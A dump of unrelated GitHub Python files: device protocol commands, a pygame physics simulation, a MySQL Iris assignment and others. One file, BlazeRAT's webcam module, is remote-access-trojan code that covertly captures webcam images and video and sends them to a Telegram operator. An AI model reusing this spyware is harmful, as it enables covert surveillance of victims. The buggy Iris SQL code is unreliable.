bytearray(bytes_2))\n\n#-----------------------------список команд------------------------\n\ncommand_info_list: List[Tuple[str, int, str, bool]] = [\n# (name_of_the_command, command_number, command_header, \n # is there additional info, is response standard)\n# number regarded as a key parameter (therefore all numbers must be unique)\n# more than that, command names editing won't break this module. 
\n # Though, it'll break others \n ('expand_all' , 10, b'\\x55\\x01\\x00\\x00\\x00\\x00', False, False), #01h\n ('contract_all' , 20, b'\\x55\\x02\\x00\\x00\\x00\\x00', False, False), #02h\n ('all_motors_stop' , 30, b'\\x55\\x03\\x00\\x00\\x00\\x00', False, False), #03h \n\n ('reflector_expand' , 41, b'\\x55\\x14\\x00\\x00\\x00\\x00', False, False), #14h\n ('reflector_contract' , 51, b'\\x55\\x15\\x00\\x00\\x00\\x00', False, False), #15h\n ('reflector_motor_open' , 61, b'\\x55\\x16\\x01\\x00\\x00\\x00', True , False), #16h\n ('reflector_motor_close' , 71, b'\\x55\\x17\\x01\\x00\\x00\\x00', True , False), #17h\n\n ('bench_expand' , 82, b'\\x55\\x28\\x00\\x00\\x00\\x00', False, False), #28h\n ('bench_contract' , 92, b'\\x55\\x29\\x00\\x00\\x00\\x00', False, False), #29h\n ('bench_tension_setup' , 102, b'\\x55\\x2A\\x04\\x00\\x00\\x00', True , False), #2Ah\n ('bench_motor_open' , 112, b'\\x55\\x2B\\x01\\x00\\x00\\x00', True , False), #2Bh\n ('bench_motor_close' , 122, b'\\x55\\x2C\\x01\\x00\\x00\\x00', True , False), #2Ch\n ('bench_motor_tension_setup', 132, b'\\x55\\x2D\\x05\\x00\\x00\\x00', True , False), #2Dh\n\n ('get_sensor_value' , 143, b'\\x55\\x3C\\x01\\x00\\x00\\x00', True , True), #3Ch\n ('get_all_sensors_values' , 153, b'\\x55\\x00\\x00\\x00\\x00\\x00', False, True), #00h \n # (last command moved to the bootom to exclude 0 command)\n]\n\nstandard_response: bytearray = bytearray(b'\\x55\\xff\\x02\\x00\\x00\\x00\\x01\\xff')\n# standard_response[2] = 16*15+13\n\n\n#----преобразователи параметров команды в информационное поле битового сообщения----\n\ndef reflector_motor_open_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in [0, 1]:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', motor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef reflector_motor_close_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in [0, 1]:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', motor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef bench_tension_setup_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n tension_value: int = info_field_params[0]\n if type(tension_value) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if (tension_value < -(2**31)) or (tension_value > 2**31 - 1 ):\n print(f'Wrong parameters for \"{cmd_name}\" command. 
'\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('l', tension_value)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef bench_motor_open_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in list(range(2, 26)): #26 is excluded\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', motor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef bench_motor_close_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in list(range(2, 26)):\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', motor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef bench_motor_tension_setup_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 2: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in list(range(2, 26)):\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n tension_value: int = info_field_params[1]\n if type(tension_value) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if (tension_value < -(2**31)) or (tension_value > 2**31 - 1 ):\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('Bl', motor_number, tension_value)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef get_sensor_value_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n sensor_number: int = info_field_params[0]\n if type(sensor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if sensor_number not in list(range(0, 25)):\n print(f'Wrong parameters for \"{cmd_name}\" command. 
'\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', sensor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\n\n#-------------проверка ответа сервера (response check funcs)-------------\n\ndef check_get_sensor_value(actual_response: bytes) -> bool:\n actual_response_btray = bytearray(actual_response)\n ideal_response_prefix = bytearray(b'\\x55\\x3C\\x05\\x00\\x00\\x00')\n ideal_response_length: int = 11\n is_command_succ = \\\n (len(actual_response_btray) == ideal_response_length) and \\\n (ideal_response_prefix in actual_response_btray)\n return is_command_succ\n\ndef check_get_all_sensors_values(actual_response: bytes) -> bool:\n actual_response_btray = bytearray(actual_response)\n ideal_response_prefix = bytearray(b'\\x55\\x00\\x68\\x00\\x00\\x00')\n ideal_response_length: int = 110\n is_command_succ = \\\n (len(actual_response_btray) == ideal_response_length) and \\\n (ideal_response_prefix in actual_response_btray)\n return is_command_succ\n\n#-------------response data decode funcs-----------------------\n","repo_name":"qu-od/aperture","sub_path":"_python_client/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":16127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11547877520","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Import modules\nfrom io import BytesIO\nfrom core.logger import Log\nfrom os import path, remove\nfrom threading import Thread\nfrom tempfile import gettempdir\nfrom core.messages import services as Messages\nfrom cv2 import VideoCapture, VideoWriter, VideoWriter_fourcc,\\\n flip, imencode # pip3 install opencv-python\n\n\"\"\"\nAuthor : LimerBoy\ngithub.com/LimerBoy/BlazeRAT\n\nNotes :\n The file is needed\n to create photos and videos from the webcam\n\"\"\"\n\n# Global variables\nglobal file, r, t, camera, output\nr, t, camera, output = False, None, None, None\nfile = path.join(gettempdir(), \"webcamera.avi\")\n\n\"\"\" Check camera by index \"\"\"\ndef _CheckCamera(device: int = 0) -> bool:\n camera = VideoCapture(device)\n status = camera.isOpened()\n camera.release()\n return status\n\n\"\"\" Capture image \"\"\"\ndef _CaptureImage(device: int = 0) -> bytes:\n # Open webcamera\n camera = VideoCapture(device)\n # If failed to open camera\n if not camera.isOpened():\n return False\n # Capture frame\n for _ in range(15):\n _, image = camera.read()\n # Release camera\n camera.release()\n del(camera)\n # Write to memory\n _, buffer = imencode(\".jpg\", image)\n obj = BytesIO(buffer)\n return obj.getvalue()\n\n\"\"\" Capture video from camera \"\"\"\ndef _CaptureVideo(device: int = 0) -> None:\n # Initialize\n global r, camera, output, file\n r = True\n camera = VideoCapture(device)\n fourcc = VideoWriter_fourcc(*\"XVID\")\n output = VideoWriter(file, fourcc, 20.0, (640,480))\n # Capture webcam\n while (r and camera.isOpened()):\n res, frame = camera.read()\n if res:\n frame = flip(frame, 0)\n output.write(frame)\n else:\n break\n\n\"\"\" Asynchronously capture video from camera \"\"\"\ndef _StartAsync(device: int = 0) -> None:\n global r, t\n if r: return False\n try:\n t = Thread(target=_CaptureVideo, args=(device,))\n t.start()\n except Exception as error:\n print(error)\n r = False\n else:\n return True\n\n\"\"\" Stop webcam capture \"\"\"\ndef _Stop() -> bytes:\n global r, t, camera, output, file\n if not r: return False\n r = False\n t.join()\n # Release everything if job is finished\n 
camera.release()\n output.release()\n # Read file and delete\n content = open(file, \"rb\")\n remove(file)\n return content\n\n\"\"\" Handle telegram command \"\"\"\ndef Handle(callback: dict, bot) -> None:\n text = callback.data\n chatid = callback.from_user.id\n device = 0\n # Detect camera device\n if \"_\" in text:\n device = int(text.split('_')[-1])\n # Take screenshot from webcamera\n if \"Screenshot\" in text:\n bot.send_chat_action(chatid, \"upload_photo\")\n # Check camera\n if not _CheckCamera(device):\n return bot.send_message(chatid, Messages.webcam_failed_open % device)\n # Log\n Log(f\"Webcam >> Create screenshot from device {device}\", chatid)\n # Take picture\n screenshot = _CaptureImage(device)\n if screenshot != False:\n bot.send_photo(chatid,\n photo=screenshot,\n caption=Messages.webcam_screenshot_captured,\n )\n # Send error message\n else:\n bot.send_message(chatid, Messages.webcam_failed_open % device)\n # Start webcam recording\n if \"Enable\" in text:\n # Check camera\n if not _CheckCamera(device):\n return bot.send_message(chatid, Messages.webcam_failed_open % device)\n # Log\n Log(f\"Webcam >> Start video recording from device {device}\", chatid)\n # Start image recording\n video = _StartAsync(device)\n if video != False:\n bot.send_message(chatid, Messages.webcam_recording_started)\n bot.send_chat_action(chatid, \"record_video\")\n # Send error message if recording already started\n else:\n bot.send_message(chatid, Messages.webcam_recording_not_stopped)\n # Stop microphone recording\n elif \"Disable\" in text:\n # Send recorded voice message\n video = _Stop()\n if video != False:\n Log(f\"Webcam >> Stop video recording from device {device}\", chatid)\n bot.send_chat_action(chatid, \"upload_video\")\n bot.send_video_note(\n chatid, video,\n reply_to_message_id=callback.message.message_id,\n )\n bot.send_message(chatid, Messages.webcam_recording_stopped)\n # Send error message if recording not started\n else:\n bot.send_message(chatid, Messages.webcam_recording_not_started)\n","repo_name":"LimerBoy/BlazeRAT","sub_path":"BlazeRAT/services/webcamera.py","file_name":"webcamera.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"3"} +{"seq_id":"71188745683","text":"import json\nimport re as RegEx\n\nclass Cars:\n def __init__(self):\n self.cars = []\n\n def append(self, car):\n self.cars.append(car)\n\nclass Car:\n def __init__(self, j):\n self.__dict__ = j\n\n def CLEANME(self):\n pattern = RegEx.compile(\"\\['(.*)'\\]\")\n for eintrag in self.__dict__:\n result = pattern.match(self.__dict__[eintrag])\n if result:\n self.__dict__[eintrag] = result.group(1)\n\n result = RegEx.match(\"(.*)\\s?/\\s?(.*)\", self.__dict__[\"hsntsn\"])\n self.hsn = result.group(1)\n self.tsn = result.group(2)\n\n del self.__dict__[\"hsntsn\"]\n del self.__dict__[\"kh10t\"]\n del self.__dict__[\"tk10t\"]\n del self.__dict__[\"vk10t\"]\n\ndef obj_dict(obj):\n return obj.__dict__\n\nwith open(\"ca.rs\", \"r\") as inp:\n with open(\"out.json\", \"w\") as out:\n cars = Cars()\n for x in json.loads(inp.read()):\n car = Car(x)\n car.CLEANME()\n cars.append(car)\n json.dump(cars, out, default=obj_dict)\n","repo_name":"ZielMartin/MobAppProj","sub_path":"pythonscript/readFile.py","file_name":"readFile.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6996478131","text":"import os, 
sys\nsys.path.append(os.getcwd())\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nimport paho.mqtt.client as mqtt\nfrom lib.client import MQTTRPCClient\nimport logging\nlogging.basicConfig( filename = 'logs/client_flow.log', level=logging.INFO, filemode = 'w' )\n \nif __name__ == '__main__':\n logger = logging.getLogger(__name__)\n mqttClient = mqtt.Client()\n mqttClient.connect('localhost',1883)\n client = MQTTRPCClient( mqttClient, False )\n for i in range(10):\n #calls calc.add(1,2) and return result\n result = client.callRemote('CalculatorService','add',[1,2]) \n print(\"result-> \" + str(result))\n\n ''' \n result = client.callRemote('CalculatorService','sub',[1,2]) \n print'result-> ', result\n result = client.callRemote('CalculatorService','mul',[1,2]) \n print'result-> ', result\n ''' \n\n","repo_name":"mastash3ff/MQTT-RPC","sub_path":"mqtt-rpc-python/examples/client_example.py","file_name":"client_example.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"1758886733","text":"from math import sin, cos, radians\n\nimport numpy as np\nimport pygame\n\n\ndef toCartesian(r, θ):\n # Return cartesian coordinates from polar as tuple.\n # Keyword Arguments:\n # r -- magnitude\n # θ -- angle (in degrees)\n\n return (r*cos(radians(θ)), -r*sin(radians(θ)))\n\n\nclass Particle(pygame.sprite.Sprite):\n def __init__(self, mass, radius, colour, position, velocity):\n pygame.sprite.Sprite.__init__(self)\n\n self.mass = mass\n self.radius = radius\n self.position = position.astype(float)\n self.velocity = velocity.astype(float) # in pixels per second\n\n # Setting the image of the particle\n self.colour = colour\n self.image = pygame.Surface((int(2*radius),)*2).convert_alpha()\n self.image.fill((0, 0, 0, 0)) # Transparent background\n pygame.draw.circle(self.image, colour, (radius, radius), radius)\n\n # Coordinates to pygame rect\n self.rect = self.image.get_rect()\n self.rect.center = position.copy()\n self.prevpos = position.copy()\n\n self.currentlyColliding = [] # For wall collisions\n self.updateProperties()\n\n def testParticleCollision(self, particle, n=1):\n # Checks whether self and particle are colliding\n # n is the number of divisions the collision checks from prevpos\n\n collided = False\n\n prevcurrS = self.position - self.prevpos\n prevcurrP = particle.position - particle.prevpos\n\n for i in range(1, n+1):\n betweenS = self.prevpos + prevcurrS * i/n\n betweenP = particle.prevpos + prevcurrP * i/n\n\n # The actual collision check!\n if pygame.sprite.collide_rect(self, particle):\n if ((betweenS - betweenP)**2).sum() <= (self.radius + particle.radius)**2:\n collided = True\n break\n\n if not(particle in self.currentlyColliding) or not(self in particle.currentlyColliding):\n if collided:\n self.position = betweenS\n particle.position = betweenP\n\n self.currentlyColliding.append(particle)\n particle.currentlyColliding.append(self)\n\n self.particleCollision(particle)\n\n if not collided:\n try:\n self.currentlyColliding.remove(particle)\n particle.currentlyColliding.remove(self)\n except ValueError:\n pass\n\n return collided\n\n def particleCollision(self, particle):\n self.updateProperties()\n particle.updateProperties()\n\n m1 = self.mass\n m2 = particle.mass\n\n x1 = self.position\n x2 = particle.position\n\n v1 = self.velocity\n v2 = particle.velocity\n\n self.velocity = v1 - (x1-x2) * 2*m2/(m1+m2) * \\\n np.dot(v2-v1, x2-x1)/((x1-x2)**2).sum()\n particle.velocity = v2 - 
(x2-x1) * 2*m1/(m2+m1) * \\\n np.dot(v1-v2, x1-x2)/((x2-x1)**2).sum()\n\n self.updateProperties()\n particle.updateProperties()\n\n def testWallCollision(self, res):\n # This method is like this to prevent particles getting stuck off-screen...\n if self.rect.left <= 0 and not 'Left Wall' in self.currentlyColliding:\n self.currentlyColliding.append('Left Wall')\n self.velocity[0] *= -1\n return True\n if self.rect.left > 0 and 'Left Wall' in self.currentlyColliding:\n if 'Left Wall' in self.currentlyColliding:\n self.currentlyColliding.remove('Left Wall')\n\n if self.rect.right >= res[0] and not 'Right Wall' in self.currentlyColliding:\n self.currentlyColliding.append('Right Wall')\n self.velocity[0] *= -1\n return True\n if self.rect.right < res[0] and 'Right Wall' in self.currentlyColliding:\n if 'Right Wall' in self.currentlyColliding:\n self.currentlyColliding.remove('Right Wall')\n\n if self.rect.top <= 0 and not 'Top Wall' in self.currentlyColliding:\n self.currentlyColliding.append('Top Wall')\n self.velocity[1] *= -1\n return True\n if self.rect.top > 0 and 'Top Wall' in self.currentlyColliding:\n if 'Top Wall' in self.currentlyColliding:\n self.currentlyColliding.remove('Top Wall')\n\n if self.rect.bottom >= res[1] and not 'Bottom Wall' in self.currentlyColliding:\n self.currentlyColliding.append('Bottom Wall')\n self.velocity[1] *= -1\n return True\n if self.rect.bottom < res[1] and 'Bottom Wall' in self.currentlyColliding:\n if 'Bottom Wall' in self.currentlyColliding:\n self.currentlyColliding.remove('Bottom Wall')\n\n return False\n\n def updatePosition(self, milli):\n self.prevpos = self.position.copy()\n self.position += self.velocity * milli/1000\n self.rect.center = tuple(round(x) for x in self.position)\n\n def updateProperties(self):\n self.speed = np.sqrt((self.velocity**2).sum())\n\n # For inspection only\n self.momentum = self.mass * self.velocity\n self.KE = 0.5 * self.mass * self.speed**2\n","repo_name":"ScxttM/cursoSimulacion","sub_path":"practica4/particle.py","file_name":"particle.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29008218134","text":"\nimport mysql.connector as mc\nimport pandas as pd\nimport unittest\nfrom sklearn import datasets as ds\n\n\n'''\n* Objective\n\nThe Iris class below manages a database version of the Iris dataset available in the sklearn package.\nBuild out the Iris class to be able to make it intelligent enough to handle\nmultiple Iris databases. Each database holds one IRIS_DATA table.\n\nHints below will help you through building this code out.\n\nWhat each function should do:\n\nIris constructor - Will allow a user to create or use an existing MySQL Iris database. The new\nflag specifies if the database should be created including the IRIS_DATA table. If the flag is false\nit will simply connect to an existing Iris database.\n\nload() - Loads the Iris data from sklearn into the MySQL database table under the dbname specified. All\n150 observations are loaded in. 
Your table should look like this: https://pasteboard.co/HPCJOiI.png\n\ndisplay_gt() - Takes an integer argument n and displays all rows with id greater than n\n\ndel_observations() - Takes a list of ids and deletes them from the table\n\nupdate_observation() - Takes 3 arguments - The id, new target species and new target_species_id and updates the \nrow with the new information\n\n\n* Suggested reading / references:\n\nhttps://dev.mysql.com/doc/connector-python/en/\nhttps://dev.mysql.com/doc/connector-python/en/connector-python-example-ddl.html\nhttps://dev.mysql.com/doc/refman/8.0/en/truncate-table.html\nhttps://dev.mysql.com/doc/connector-python/en/connector-python-example-cursor-transaction.html\nhttps://dev.mysql.com/doc/refman/8.0/en/use.html\n\n\nhttps://www.w3schools.com/sql/sql_select.asp\nhttps://www.w3schools.com/sql/sql_insert.asp\nhttps://www.w3schools.com/sql/sql_delete.asp\nhttps://www.w3schools.com/sql/sql_update.asp\nhttps://www.w3schools.com/sql/sql_drop_db.asp\n\n\n* DDL for iris_data table and sample SQL statements:\n\nDROP DATABASE data602;\nCREATE DATABASE data602;\nUSE data602;\nDROP TABLE IF EXISTS iris_data;\n\nCREATE TABLE iris_data (\n\tid INT NOT NULL,\n feature_sepal_length FLOAT NOT NULL,\n feature_sepal_width FLOAT NOT NULL,\n feature_petal_length FLOAT NOT NULL,\n feature_petal_width FLOAT NOT NULL,\n target_species VARCHAR(20) NOT NULL,\n target_species_id INT NOT NULL\n\n);\n\nHint: When building this out, temporarily remove the NOT NULLs in the IRIS_DATA so that you can test without \nhaving to add data in all columns\n\nThe database host address is assumed to be 127.0.0.1 (your local computer)\n\nA successful run of the unit tests will look like this:\n\n$ python .\\08_assignment_solution.py\nDatabase and IRIS table created in DB data602\nRow count is 0\nIris dataset loaded\nRow count is 150\nIris dataset loaded\nRow count is 300\nDatabase and IRIS table created in DB data602x\nRow count is 0\nIris dataset loaded\nRow count is 150\nIris table truncated\nIris dataset loaded\nRow count is 150\n(149, 5.9, 3.0, 5.1, 1.8, 'virginica', 2)\n(149, 5.9, 3.0, 5.1, 1.8, 'stuff', 5)\n(149, 5.9, 3.0, 5.1, 1.8, 'virginica', 2)\nRow count is 144\nRow count is 150\n.\n----------------------------------------------------------------------\nRan 1 test in 0.658s\n\n'''\ndef main():\n # Usage example. 
\n \n #Change get_credentials() with your password.\n creds = get_credentials()\n iris = Iris(creds) # Create a MySQL database called data602\n iris.load() # Load Iris data from sklearn and pump it into IRIS_DATA table\n iris.display_gt(140) # Display to the screen all rows with ID greater than 140\n \n iris2 = Iris(creds,dbname='anotherone') # Creates a 2nd MySQL database called anotherone, you now have 2 databases (one server still, tho)\n iris2.load() # Load Iris data\n iris2.del_observations([0,1,2]) # Delete observations that have id equal to 0, 1 or 2\n\n iris.update_observation(0,'stuff',5) # Change observation id 0 to a different label\n\n iris.close() # Close connection\n iris2.close() # Close connection\n\n# Change password\ndef get_credentials():\n return {'user':'root','password':'passtest'}\n\nclass Iris:\n def __init__(self,creds,dbname='data602',new=True):\n self.__conn = self.__get_connection(creds)\n # connect and store the connection object \n self.__dbname = dbname # store the database name\n\n if new:\n # if new, create database / table\n self.__create()\n else:\n # else make sure to USE the right database\n cursor = self.__conn.cursor()\n cursor.execute(\"USE data602\")\n cursor.close()\n\n # Drop the database and create a new one with a new table\n def __create(self):\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n \n try:\n cursor.execute(\"DROP DATABASE IF EXISTS data602\")\n cursor.execute(\"DROP TABLE IF EXISTS iris_data\")\n except:\n pass\n cursor.execute('CREATE DATABASE {}'.format(self.__dbname))\n \n cursor.execute('USE {}'.format(self.__dbname))\n \n cursor.execute('''\n CREATE TABLE iris(\n id INT NOT NULL,\n feature_sepal_length FLOAT NOT NULL,\n feature_sepal_width FLOAT NOT NULL,\n feature_petal_length FLOAT NOT NULL,\n feature_petal_width FLOAT NOT NULL,\n target_special VARCHAR(20) NOT NULL,\n target_species_id INT NOT NULL\n )\n ''')\n cursor.close()\n\n # ------ Place code above here /\\ /\\ /\\ ------\n print(\"Database and IRIS table created in DB {}\".format(self.__dbname))\n # Close connection\n \n def close(self):\n # ------ Place code below here \\/ \\/ \\/ ------\n self.__conn.close()\n\n # ------ Place code above here /\\ /\\ /\\ ------\n print('Disconnected')\n\n # Loop the Iris data and INSERT into the IRIS_DATA table\n def load(self,truncate=False):\n if truncate:\n # ------ Place code below here \\/ \\/ \\/ ------\n self.__truncate_iris()\n\n # ------ Place code above here /\\ /\\ /\\ ------\n print('Iris table truncated')\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n iris = ds.load_iris()\n df = pd.DataFrame(iris.data, columns=iris.feature_names)\n df[\"Species\"] = pd.Categorical.from_codes(iris.target, iris.target_names)\n df[\"SpeciesId\"] = iris.target\n \n for index, row in iris.iterrows():\n cursor.execute(\"INSERT INTO iris (id, feature_sepal_length, feature_sepal_wdith, feature_petal_length, feature_petal_width, target_species, target_species_id) VALUES (%s, %s, %s, %s, %s, %s, %s)\", (index, row[\"sepal length (cm)\"], row[\"sepal width (cm)\"], row['petal length (cm)'], row['petal width (cm)'], row['Species'], row['SpeciesID']) )\n \n \n \n self.__conn.commit()\n # ------ Place code above here /\\ /\\ /\\ ------\n print('Iris dataset loaded')\n\n # Display all rows that have ID greater than integer n\n def display_gt(self,n): \n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n cursor.execute('SELECT * FROM iris WHERE 
id > {a}'.format(a=n))\n records = cursor.fetchall()\n for i in records:\n print(i)\n cursor.close()\n # ------ Place code above here /\\ /\\ /\\ ------\n\n # Update observation with a specific id to a new target species and species id\n def update_observation(self,id,new_target_species,new_target_species_id):\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n cursor.execute('USE {};'.format(self.__dbname))\n \n \n cursor.execute(\"SELECT * FROM iris\")\n sql = \"UPDATE iris SET target_species=%s, target_species_id=%s WHERE id = %s\"\n values = (new_target_species,new_target_species_id, id)\n cursor.execute(sql, values)\n self.__conn.commit()\n\n # ------ Place code above here /\\ /\\ /\\ ------\n\n # Delete all rows that are in the list row_ids \n def del_observations(self,row_ids):\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor(buffer=True)\n \n cursor.execute('DELETE FROM iris WHERE id IN {}'.format(tuple(row_ids)))\n self.__conn.commit()\n \n #USE of IN operator - AKA the reson for converting row_ids to tuple\n #Ref: https://www.w3schools.com/sql/sql_in.asp\n # ------ Place code above here /\\ /\\ /\\ ------\n\n # Truncate the IRIS_DATA table\n def __truncate_iris(self):\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n \n cursor.execute('TRUNCATE TABLE iris') # delete all rows of iris data table\n self.__conn.commit()\n # ------ Place code above here /\\ /\\ /\\ ------\n\n # Establish a connection\n def __get_connection(self,creds):\n return mc.connect(user=creds['user'], password=creds['password'],\n host='127.0.0.1',\n auth_plugin='mysql_native_password') \n\n # Returns the current row count of the IRIS_DATA table\n def get_row_count(self):\n # ------ Place code below here \\/ \\/ \\/ ------\n \n #Establish connection using credentials \n cursor = self.__conn.cursor(buffered = True) # handles 'undread result error'\n cursor.execute('SELECT COUNT (*) FROM iris')\n count = cursor.fetchone()[0] # extract count # from '()' around it, if not error\n print('Row count is {}'.format(count))\n \n #cursor.execute(SELECT * FROM iris)\n #count = cursor.rowcount\n #if count == 'None':\n #count = 0\n # ------ Place code above here /\\ /\\ /\\ ------\n return count\n\nclass TestAssignment8(unittest.TestCase):\n def test(self):\n creds = get_credentials()\n db1 = Iris(creds)\n self.assertEqual(db1.get_row_count(),0)\n db1.load()\n self.assertEqual(db1.get_row_count(),150)\n db1.load()\n self.assertEqual(db1.get_row_count(),300)\n db2 = Iris(creds,dbname='data602x')\n self.assertEqual(db2.get_row_count(),0)\n db2.load()\n self.assertEqual(db2.get_row_count(),150)\n db1.load(truncate=True)\n self.assertEqual(db1.get_row_count(),150)\n db1.display_gt(148)\n db1.update_observation(149,'stuff',5)\n db1.display_gt(148)\n db2.display_gt(148)\n db1.del_observations([0,1,2,3,4,5])\n self.assertEqual(db1.get_row_count(),144)\n self.assertEqual(db2.get_row_count(),150)\n\n\nif __name__ == '__main__':\n #main()\n unittest.main()\n","repo_name":"geeman1209/MSDATA2020","sub_path":"Data 602/pythoncourse-master (3)/pythoncourse-master/08_assignment.py","file_name":"08_assignment.py","file_ext":"py","file_size_in_byte":10857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22668512212","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a 
copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport os\nimport unittest\n\nfrom mock import Mock, create_autospec, patch\n\nfrom apache.aurora.executor.bin.thermos_executor_main import dump_runner_pex, initialize, proxy_main\nfrom apache.aurora.executor.common.path_detector import MesosPathDetector\nfrom apache.aurora.executor.thermos_task_runner import DefaultThermosTaskRunnerProvider\n\n\ndef test_thermos_executor_valid_import_dependencies():\n assert proxy_main is not None\n\n\nclass ThermosExecutorMainTest(unittest.TestCase):\n def test_checkpoint_path(self):\n mock_runner_provider = create_autospec(spec=DefaultThermosTaskRunnerProvider)\n mock_dump_runner_pex = create_autospec(spec=dump_runner_pex)\n mock_dump_runner_pex.return_value = Mock()\n mock_options = Mock()\n mock_options.execute_as_user = False\n mock_options.nosetuid = False\n mock_options.announcer_ensemble = None\n mock_options.stop_timeout_in_secs = 1\n with patch(\n 'apache.aurora.executor.bin.thermos_executor_main.dump_runner_pex',\n return_value=mock_dump_runner_pex):\n with patch(\n 'apache.aurora.executor.bin.thermos_executor_main.DefaultThermosTaskRunnerProvider',\n return_value=mock_runner_provider) as mock_provider:\n\n expected_path = os.path.join(os.path.abspath('.'), MesosPathDetector.DEFAULT_SANDBOX_PATH)\n thermos_executor = initialize(mock_options)\n\n assert thermos_executor is not None\n assert len(mock_provider.mock_calls) == 1\n args = mock_provider.mock_calls[0][1]\n assert len(args) == 2 and expected_path == args[1]\n","repo_name":"apache/aurora","sub_path":"src/test/python/apache/aurora/executor/bin/test_thermos_executor_entry_point.py","file_name":"test_thermos_executor_entry_point.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":630,"dataset":"github-code","pt":"3"} +{"seq_id":"6183054337","text":"from typing import Optional, Tuple\nimport threading\nimport requests\n\nfrom mycroft.skills import AdaptIntent, GuiClear, intent_handler\nfrom mycroft.skills.common_play_skill import CommonPlaySkill, CPSMatchLevel\nfrom mycroft_bus_client import Message\n\nfrom .RadioStations import GenreTagNotFound, RadioStations\n\n# Minimum confidence levels\nCONF_EXACT_MATCH = 